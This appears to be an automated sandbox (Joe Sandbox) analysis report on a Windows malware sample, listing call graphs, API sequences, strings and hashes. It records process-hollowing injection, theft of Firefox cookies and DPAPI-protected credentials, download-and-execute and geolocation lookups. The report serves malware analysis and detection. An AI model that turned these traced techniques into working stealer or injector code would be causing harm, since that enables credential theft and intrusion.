126703->126721 126704->126690 126706->126690 126707->126690 126708->126690 126710 6fe90f9e 126709->126710 126723 6fe9141f IsProcessorFeaturePresent 126710->126723 126712 6fe90faa 126724 6fe93f0d 10 API calls 2 library calls 126712->126724 126714 6fe90faf 126715 6fe90fb3 126714->126715 126725 6fe93f3f 7 API calls 2 library calls 126714->126725 126715->126695 126726 6fe90fce 126717->126726 126719 6fe90efe 126719->126701 126720->126703 126721->126704 126722->126700 126723->126712 126724->126714 126725->126715 126727 6fe90fda 126726->126727 126728 6fe90fde 126726->126728 126727->126719 126731 6fe90feb 
___scrt_release_startup_lock 126728->126731 126732 6fe91134 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 126728->126732 126730 6fe91054 126731->126719 126732->126730 126733 6fe90c03 126734 6fe90c0c 126733->126734 126735 6fe90c11 126733->126735 126754 6fe90dd0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 126734->126754 126739 6fe90acd 126735->126739 126740 6fe90ad9 __FrameHandler3::FrameUnwindToState 126739->126740 126741 6fe90ae8 126740->126741 126742 6fe90b02 dllmain_raw 126740->126742 126743 6fe90afd 126740->126743 126742->126741 126744 6fe90b1c dllmain_crt_dispatch 126742->126744 126755 6fe4a0a0 126743->126755 126744->126741 126744->126743 126747 6fe90b6e 126747->126741 126748 6fe90b77 dllmain_crt_dispatch 126747->126748 126748->126741 126750 6fe90b8a dllmain_raw 126748->126750 126749 6fe4a0a0 __DllMainCRTStartup@12 64 API calls 126751 6fe90b55 126749->126751 126750->126741 126774 6fe90a1d 147 API calls 4 library calls 126751->126774 126753 6fe90b63 dllmain_raw 126753->126747 126754->126735 126756 6fe4a0e5 GetProcAddress 126755->126756 126773 6fe4a16a 126755->126773 126775 6fe4a9a0 126756->126775 126759 6fe4a14e 126785 6fe4af50 49 API calls __DllMainCRTStartup@12 126759->126785 126761 6fe4a168 126786 6fe4a650 63 API calls __DllMainCRTStartup@12 126761->126786 126763 6fe4a20a 126787 6fe4b030 49 API calls __DllMainCRTStartup@12 126763->126787 126765 6fe4a226 126788 6fe57190 HeapFree __DllMainCRTStartup@12 126765->126788 126767 6fe4a234 126789 6fe462c0 HeapFree __DllMainCRTStartup@12 126767->126789 126769 6fe4a249 126790 6fe57190 HeapFree __DllMainCRTStartup@12 126769->126790 126771 6fe4a25e 126791 6fe465e0 HeapFree __DllMainCRTStartup@12 126771->126791 126773->126747 126773->126749 126774->126753 126792 6fe47c70 126775->126792 126777 6fe4ab28 __DllMainCRTStartup@12 126777->126759 126778 6fe4aa18 __DllMainCRTStartup@12 126778->126777 126779 

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0006DB89), ref: 0007AD92
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AD9B
                                                                                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0006DB89), ref: 0007ADB6
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007ADB9
                                                                                                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0006DB89), ref: 0007ADCA
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007ADCD
                                                                                                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0006DB89), ref: 0007ADE2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007ADE5
                                                                                                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0006DB89), ref: 0007ADF6
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007ADF9
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0006DB89), ref: 0007AE05
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE08
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0006DB89), ref: 0007AE19
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE1C
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0006DB89), ref: 0007AE2D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE30
                                                                                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0006DB89), ref: 0007AE41
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE44
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0006DB89), ref: 0007AE55
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE58
                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0006DB89), ref: 0007AE69
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE6C
                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0006DB89), ref: 0007AE7D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE80
                                                                                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0006DB89), ref: 0007AE91
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AE94
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0006DB89), ref: 0007AEA5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AEA8
                                                                                                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0006DB89), ref: 0007AEB6
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AEB9
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,0006DB89), ref: 0007AECA
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AECD
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,0006DB89), ref: 0007AEDE
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AEE1
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,0006DB89), ref: 0007AEF2
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AEF5
                                                                                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,0006DB89), ref: 0007AF06
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF09
                                                                                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,0006DB89), ref: 0007AF1A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF1D
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,0006DB89), ref: 0007AF2E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF31
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,0006DB89), ref: 0007AF42
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF45
                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,0006DB89), ref: 0007AF57
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF5A
                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,0006DB89), ref: 0007AF67
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF6A
                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,0006DB89), ref: 0007AF77
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF7A
                                                                                                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,0006DB89), ref: 0007AF87
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007AF8A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                • API String ID: 4236061018-3687161714
                                                                                                                                                                • Opcode ID: aac0ccd537d8fcefd03575b043e1854775ee4d5b8cbff118c476392b71a53c50
                                                                                                                                                                • Instruction ID: 04b4f0dea5b7981d34f5737f70cd1f6786ebff80a53d4d47833ab89b3e92a840
                                                                                                                                                                • Opcode Fuzzy Hash: aac0ccd537d8fcefd03575b043e1854775ee4d5b8cbff118c476392b71a53c50
                                                                                                                                                                • Instruction Fuzzy Hash: 1841DEF0E8235879EA106BB65D4EE5F2E5CDB84B94302891FB6049B591DFBC98008F7D

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0007647F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00076486
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00076497
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0007649E
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 000764AF
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 000764B6
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 000764C7
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 000764CE
                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,0006421E), ref: 0007656E
                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00076586
                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(FFFFDD03,00000000), ref: 0007659B
                                                                                                                                                                • ReadProcessMemory.KERNEL32(0006421E,?,?,00000004,?), ref: 000765BF
                                                                                                                                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 000765E5
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(0006421E,?), ref: 0007660A
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,0006421E,0006421E,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00076627
                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00076639
                                                                                                                                                                • NtClose.NTDLL(?), ref: 00076642
                                                                                                                                                                • TerminateProcess.KERNEL32(0006421E,00000000), ref: 0007664C
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00076685
                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 0007668F
                                                                                                                                                                • WriteProcessMemory.KERNEL32(0006421E,?,0006421E,00000004,00000000), ref: 0007673F
                                                                                                                                                                • Wow64SetThreadContext.KERNEL32(FFFFDD03,00000000), ref: 0007675B
                                                                                                                                                                • ResumeThread.KERNEL32(FFFFDD03), ref: 00076768
                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0007677F
                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00076789
                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 00076790
                                                                                                                                                                • NtClose.NTDLL(?), ref: 00076799
                                                                                                                                                                • TerminateProcess.KERNEL32(0006421E,00000000), ref: 000767A3
                                                                                                                                                                • GetLastError.KERNEL32 ref: 000767AB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                • API String ID: 3150337530-3035715614
                                                                                                                                                                • Opcode ID: 0b95feb125f786a2f43ceac0ae5affd588e51665701a09c2c96239e0bfc848ad
                                                                                                                                                                • Instruction ID: e885ca2edebd24628b31ad3c3e0cfe17553861ecfc032da233149532cf7e63d6
                                                                                                                                                                • Opcode Fuzzy Hash: 0b95feb125f786a2f43ceac0ae5affd588e51665701a09c2c96239e0bfc848ad
                                                                                                                                                                • Instruction Fuzzy Hash: 12B18EB1E00605AFEF148FA4DC89FAEBBB9FF44705F144129F606EA190D779A840CB65

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00068BCD: char_traits.LIBCPMT ref: 00068BE8
                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0006BF93
                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0006C0B0
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0006C0BF
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0006C0EA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Find$CloseFile$FirstNextchar_traits
                                                                                                                                                                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                • API String ID: 2264501223-405221262

                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1083526818-0

                                                                                                                                                                APIs
                                                                                                                                                                • NtReadFile.NTDLL ref: 6FE7C855
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FE7C865
                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 6FE7C89D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorFileObjectReadSingleStatusWait
                                                                                                                                                                • String ID: 0o$0o$0o
                                                                                                                                                                • API String ID: 3583596364-1003907229
                                                                                                                                                                APIs
                                                                                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0007968C
                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 000796A3
                                                                                                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 000796BA
                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 000796FA
                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 000796FF
                                                                                                                                                                Strings
                                                                                                                                                                • http://geoplugin.net/json.gp, xrefs: 0007969A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                                                                                                • API String ID: 3121278467-91888290
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00071919: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00071939
                                                                                                                                                                  • Part of subcall function 00071919: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,000D22B8), ref: 00071957
                                                                                                                                                                  • Part of subcall function 00071919: RegCloseKey.KERNEL32(?), ref: 00071962
                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0006E3B8
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0006E427
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                                                                                • String ID: 4.9.4 Pro$override$pth_unenc
                                                                                                                                                                • API String ID: 2281282204-930821335
                                                                                                                                                                APIs
                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0006706D
                                                                                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00067151
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                                                                                • String ID: C:\Users\user\task.exe$open
                                                                                                                                                                • API String ID: 2825088817-3696620667
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,?,00066AB5,?,?,00000000,00000000), ref: 00066B1C
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00066B23
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                • String ID: CryptUnprotectData$crypt32
                                                                                                                                                                • API String ID: 2574300362-2380590389
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 6FE7CA20: WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000081), ref: 6FE7CA4D
                                                                                                                                                                • bind.WS2_32(?,?,00000010), ref: 6FE7F9D4
                                                                                                                                                                • listen.WS2_32(?,00000080), ref: 6FE7F9E5
                                                                                                                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FE45B22), ref: 6FE7F9F8
                                                                                                                                                                • closesocket.WS2_32(?), ref: 6FE7FA0F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastSocketbindclosesocketlisten
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1850986032-0
                                                                                                                                                                APIs
                                                                                                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,?,00090E3A,00000034,00000000,?,?), ref: 00091196
                                                                                                                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,00090E3A,00000034,00000000,?,?), ref: 000911AB
                                                                                                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00090E3A,00000034,00000000,?,?), ref: 000911BD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1815803762-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000000B,000D2318), ref: 0007990B
                                                                                                                                                                • GetUserNameW.ADVAPI32(?,00000010), ref: 00079923
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Name$ComputerUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4229901323-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,0007383C,000D1EC0,000D29D0,000D1EC0,00000000,000D1EC0,00000000,000D1EC0,4.9.4 Pro), ref: 0006E442
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2299586839-0

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0006DB89), ref: 0007AD92
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AD9B
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0006DB89), ref: 0007ADB6
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007ADB9
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0006DB89), ref: 0007ADCA
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007ADCD
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0006DB89), ref: 0007ADE2
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007ADE5
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0006DB89), ref: 0007ADF6
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007ADF9
                                                                                                                                                                  • Part of subcall function 0007AD7F: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0006DB89), ref: 0007AE05
                                                                                                                                                                  • Part of subcall function 0007AD7F: GetProcAddress.KERNEL32(00000000), ref: 0007AE08
